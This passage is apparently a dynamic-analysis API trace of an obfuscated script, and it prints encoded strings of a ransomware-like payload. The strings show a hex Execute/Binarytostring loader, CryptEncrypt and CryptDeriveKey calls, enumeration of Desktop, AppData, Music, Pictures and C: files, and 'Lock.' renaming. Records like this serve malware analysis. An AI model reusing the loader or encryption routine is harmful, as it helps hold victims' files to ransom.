(HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64648 [0081.621] CharUpperBuffW (in: lpsz="Binarytostring", cchLength=0xe | out: lpsz="BINARYTOSTRING") returned 0xe [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64528 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a646a8 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1a0) returned 0x29f7498 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68410 | out: hHeap=0x2af0000) returned 1 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x350) returned 0x29f7640 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7498 | out: hHeap=0x2af0000) returned 1 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64798 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53b00 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a644f8 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646c0 [0081.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64798 | out: hHeap=0x2af0000) returned 1 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64540 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64570 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a646d8 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0380 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646f0 [0081.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645b8 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e03a0 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645d0 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64708 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e03f0 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64588 [0081.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e03f0 | out: hHeap=0x2af0000) returned 1 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7f) returned 0x29f7998 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e03f0 [0081.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64588 | out: hHeap=0x2af0000) returned 1 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7498 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0410 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100) returned 0x29f7520 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0430 [0081.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x29f7498, cbMultiByte=128, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 128 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100) returned 0x2a68410 [0081.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x29f7498, cbMultiByte=128, lpWideCharStr=0x2a68410, cchWideChar=128 | out: lpWideCharStr="Execute(Binarytostring('0x537472696E6753706C69742846696C655265616428244134333030303035443331737A5F292C2721443436436F272C3129'))") returned 128 [0081.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68410 | out: hHeap=0x2af0000) returned 1 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644b0 [0081.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7498 | out: hHeap=0x2af0000) returned 1 [0081.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7998 | out: hHeap=0x2af0000) returned 1 [0081.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e03f0 | out: hHeap=0x2af0000) returned 1 [0081.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64708 | out: hHeap=0x2af0000) returned 1 [0081.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645d0 | out: hHeap=0x2af0000) returned 1 [0081.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e03a0 | out: hHeap=0x2af0000) returned 1 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68410 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e03a0 [0081.622] CharUpperBuffW (in: lpsz="Execute", cchLength=0x7 | out: lpsz="EXECUTE") returned 0x7 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64708 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64720 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64510 [0081.622] CharUpperBuffW (in: lpsz="Binarytostring", cchLength=0xe | out: lpsz="BINARYTOSTRING") returned 0xe [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64588 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64750 [0081.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64768 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a539e8 [0081.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64708 | out: hHeap=0x2af0000) returned 1 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64708 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64798 [0081.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64768 | out: hHeap=0x2af0000) returned 1 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a645a0 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64768 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a645d0 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e03f0 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645e8 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648d0 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a80 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a08 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05c0 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647b0 [0081.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05c0 | out: hHeap=0x2af0000) returned 1 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x31) returned 0x2a5e940 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04e0 [0081.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647b0 | out: hHeap=0x2af0000) returned 1 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x32) returned 0x2a5e980 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04f0 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x64) returned 0x29f7498 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0570 [0081.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x2a5e980, cbMultiByte=50, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x64) returned 0x29f7998 [0081.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x2a5e980, cbMultiByte=50, lpWideCharStr=0x29f7998, cchWideChar=50 | out: lpWideCharStr="StringSplit(FileRead($A4300005D31sz_),'!D46Co',1)") returned 50 [0081.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7998 | out: hHeap=0x2af0000) returned 1 [0081.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a649c0 [0081.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0081.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0081.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04e0 | out: hHeap=0x2af0000) returned 1 [0081.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a08 | out: hHeap=0x2af0000) returned 1 [0081.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0081.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a684e8 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0410 [0081.624] CharUpperBuffW (in: lpsz="StringSplit", cchLength=0xb | out: lpsz="STRINGSPLIT") returned 0xb [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a68 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a649a8 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a647b0 [0081.624] CharUpperBuffW (in: lpsz="FileRead", cchLength=0x8 | out: lpsz="FILEREAD") returned 0x8 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64870 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a648e8 [0081.624] CharUpperBuffW (in: lpsz="A4300005D31sz_", cchLength=0xe | out: lpsz="A4300005D31SZ_") returned 0xe [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a80 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a53808 [0081.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a649f0 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647c8 [0081.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64a80 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a647f8 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e05e0 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648a0 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648b8 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64a08 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a20 [0081.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0081.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a53808 | out: hHeap=0x2af0000) returned 1 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64810 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0550 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a98 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64a50 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64828 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2a64a38 [0081.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a98 | out: hHeap=0x2af0000) returned 1 [0081.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0550 | out: hHeap=0x2af0000) returned 1 [0081.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0690 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a68 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64930 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0660 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64900 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64960 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04f0 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64918 [0081.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647e0 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64840 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04d0 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a69f18 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a649d8 [0081.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0510 [0081.625] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\gqrfdkv" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\gqrfdkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0081.660] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.660] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cef44 | out: lpNewFilePointer=0x0) returned 1 [0081.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a79f20 [0081.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0640 [0081.661] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cef58 | out: lpNewFilePointer=0x0) returned 1 [0081.661] ReadFile (in: hFile=0x294, lpBuffer=0x2a69f18, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cef6c, lpOverlapped=0x0 | out: lpBuffer=0x2a69f18*, lpNumberOfBytesRead=0x8cef6c*=0x20c4, lpOverlapped=0x0) returned 1 [0081.661] ReadFile (in: hFile=0x294, lpBuffer=0x2a69f18, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cef6c, lpOverlapped=0x0 | out: lpBuffer=0x2a69f18*, lpNumberOfBytesRead=0x8cef6c*=0x0, lpOverlapped=0x0) returned 1 [0081.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0640 | out: hHeap=0x2af0000) returned 1 [0081.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79f20 | out: hHeap=0x2af0000) returned 1 [0081.662] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.662] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cef50 | out: lpNewFilePointer=0x0) returned 1 [0081.662] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.662] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cef50 | out: lpNewFilePointer=0x0) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64858 [0081.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0500 [0081.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a98 [0081.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04e0 [0081.662] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cef14 | out: lpNewFilePointer=0x0) returned 1 [0081.662] ReadFile (in: hFile=0x294, lpBuffer=0x2a69f18, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cef28, lpOverlapped=0x0 | out: lpBuffer=0x2a69f18*, lpNumberOfBytesRead=0x8cef28*=0x20c4, lpOverlapped=0x0) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a68f80 [0081.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a98 | out: hHeap=0x2af0000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a685c0 [0081.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68f80 | out: hHeap=0x2af0000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf0) returned 0x2af7338 [0081.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a685c0 | out: hHeap=0x2af0000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1f0) returned 0x2af7430 [0081.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af7338 | out: hHeap=0x2af0000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3f0) returned 0x2af7628 [0081.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af7430 | out: hHeap=0x2af0000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7f0) returned 0x2af7a20 [0081.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af7628 | out: hHeap=0x2af0000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xff0) returned 0x29e6058 [0081.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af7a20 | out: hHeap=0x2af0000) returned 1 [0081.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1ff0) returned 0x29e7050 [0081.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e6058 | out: hHeap=0x2af0000) returned 1 [0081.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3ff0) returned 0x29e9048 [0081.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e7050 | out: hHeap=0x2af0000) returned 1 [0081.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x29e9048, cbMultiByte=8389, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8389 [0081.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x418a) returned 0x29ed040 [0081.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x29e9048, cbMultiByte=8389, lpWideCharStr=0x29ed040, cchWideChar=8389 | out: lpWideCharStr="203120!D46Co20323420!D46Co202D32363834333534353620!D46Co203120!D46Co203120!D46Co20333237373120!D46Co20323631313320!D46Co203020!D46Co203320!D46Co203020!D46Co41647661706933322E646C6C!D46Co203120!D46Co203020!D46Co20404F5356657273696F6E20!D46Co57494E5F32303030!D46Co626F6F6C!D46Co437279707441637175697265436F6E74657874!D46Co68616E646C652A!D46Co203020!D46Co707472!D46Co203020!D46Co707472!D46Co203020!D46Co64776F7264!D46Co64776F7264!D46Co203020!D46Co203220!D46Co203020!D46Co203120!D46Co203020!D46Co626F6F6C!D46Co437279707452656C65617365436F6E74657874!D46Co68616E646C65!D46Co64776F7264!D46Co203020!D46Co626F6F6C!D46Co437279707443726561746548617368!D46Co68616E646C65!D46Co75696E74!D46Co707472!D46Co203020!D46Co64776F7264!D46Co203020!D46Co68616E646C652A!D46Co203020!D46Co203020!D46Co203120!D46Co203120!D46Co203520!D46Co627974655B!D46Co5D!D46Co203120!D46Co626F6F6C!D46Co43727970744861736844617461!D46Co68616E646C65!D46Co7374727563742A!D46Co64776F7264!D46Co64776F7264!D46Co203020!D46Co203220!D46Co203120!D46Co626F6F6C!D46Co43727970744465726976654B6579!D46Co68616E646C65!D46Co75696E74!D46Co68616E646C65!D46Co64776F7264!D46Co68616E646C652A!D46Co203020!D46Co203020!D46Co203320!D46Co203120!D46Co203020!D46Co203520!D46Co203020!D46Co626F6F6C!D46Co437279707444657374726F7948617368!D46Co68616E646C65!D46Co203020!D46Co626F6F6C!D46Co437279707444657374726F794B6579!D46Co68616E646C65!D46Co203020!D46Co203120!D46Co203020!D46Co203020!D46Co203020!D46Co203120!D46Co203120!D46Co626F6F6C!D46Co4372797074456E6372797074!D46Co68616E646C65!D46Co68616E646C65!D46Co203020!D46Co626F6F6C!D46Co64776F7264!D46Co203020!D46Co707472!D46Co203020!D46Co64776F72642A!D46Co64776F7264!D46Co203020!D46Co203020!D46Co203220!D46Co203120!D46Co203620!D46Co627974655B!D46Co5D!D46Co203120!D46Co626F6F6C!D46Co4372797074456E6372797074!D46Co68616E646C65!D46Co68616E646C65!D46Co203020!D46Co626F6F6C!D46Co64776F7264!D46Co203020!D46Co7374727563742A!D46Co64776F72642A!D46Co64776F7264!D46Co203020!D46Co203320!D46Co203120!D46Co203020!D46Co203120!D46Co203020!D46Co203020!D46Co203020!D46Co203120!D46Co203120!D46Co20313620!D46Co203220!D46Co203120!D46Co20323620!D46Co203320!D46Co203120!D46Co203130323420!D46Co203130323420!D46Co203420!D46Co203120!D46Co203220!D46Co203520!D46Co203120!D46Co203220!D46Co203120!D46Co203120!D46Co203020!D46Co203020!D46Co203020!D46Co203120!D46Co203020!D46Co203020!D46Co203020!D46Co203120!D46Co203120!D46Co203120!D46Co203220!D46Co203220!D46Co7C!D46Co5B5C5C2F5D2B5C7A!D46Co5C!D46Co203120!D46Co203120!D46Co5B5C5C2F3A3E3C5C7C5D7C283F73295C415C732A5C7A!D46Co203220!D46Co203220!D46Co203020!D46Co203120!D46Co203220!D46Co203320!D46Co203320!D46Co203420!D46Co203420!D46Co203120!D46Co203220!D46Co203420!D46Co203420!D46Co203120!D46Co7C!D46Co203120!D46Co203120!D46Co2032353620!D46Co203831393220!D46Co20333237363820!D46Co203820!D46Co203820!D46Co203820!D46Co7573657233322E646C6C!D46Co626F6F6C!D46Co53797374656D506172616D6574657273496E666F57!D46Co75696E74!D46Co75696E74!D46Co707472!D46Co75696E74!D46Co203020!D46Co20323020!D46Co204054656D7044697220!D46Co2F776C2E6A7067!D46Co203020!D46Co20404465736B746F7044697220!D46Co2A2E2A!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co4C6F636B2E!D46Co46697865642E!D46Co20404465736B746F7044697220!D46Co2F!D46Co20404465736B746F7044697220!D46Co2F4C6F636B2E!D46Co383838!D46Co20404465736B746F7044697220!D46Co2F!D46Co20404465736B746F7044697220!D46Co2F!D46Co203120!D46Co20405573657250726F66696C6544697220!D46Co2F417070446174612F526F616D696E67!D46Co2A2E2A!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co4C6F636B2E!D46Co46697865642E!D46Co20405573657250726F66696C6544697220!D46Co2F417070446174612F526F616D696E672F!D46Co20405573657250726F66696C6544697220!D46Co2F417070446174612F526F616D696E672F4C6F636B2E!D46Co383838!D46Co20405573657250726F66696C6544697220!D46Co2F417070446174612F526F616D696E672F!D46Co20405573657250726F66696C6544697220!D46Co2F417070446174612F526F616D696E672F!D46Co203120!D46Co20405573657250726F66696C6544697220!D46Co2F417070446174612F4C6F63616C!D46Co2A2E2A!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co4C6F636B2E!D46Co46697865642E!D46Co20405573657250726F66696C6544697220!D46Co2F417070446174612F4C6F63616C2F!D46Co20405573657250726F66696C6544697220!D46Co2F417070446174612F4C6F63616C2F4C6F636B2E!D46Co383838!D46Co20405573657250726F66696C6544697220!D46Co2F417070446174612F4C6F63616C2F!D46Co20405573657250726F66696C6544697220!D46Co2F417070446174612F4C6F63616C2F!D46Co203120!D46Co4649584544!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co633A!D46Co2A2E2A!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co4C6F636B2E!D46Co46697865642E!D46Co2F!D46Co2F4C6F636B2E!D46Co383838!D46Co2F!D46Co2F!D46Co203120!D46Co20405573657250726F66696C6544697220!D46Co5C4D75736963!D46Co2A2E2A!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co4C6F636B2E!D46Co46697865642E!D46Co20405573657250726F66696C6544697220!D46Co5C4D75736963!D46Co5C!D46Co20405573657250726F66696C6544697220!D46Co5C4D75736963!D46Co2F4C6F636B2E!D46Co383838!D46Co20405573657250726F66696C6544697220!D46Co5C4D75736963!D46Co5C!D46Co20405573657250726F66696C6544697220!D46Co5C4D75736963!D46Co5C!D46Co203120!D46Co20405573657250726F66696C6544697220!D46Co5C5069637475726573!D46Co2A2E2A!D46Co203120!D46Co203120!D46Co203020!D46Co203120!D46Co4C6F636B2E!D46Co46697865642E!D46Co204055736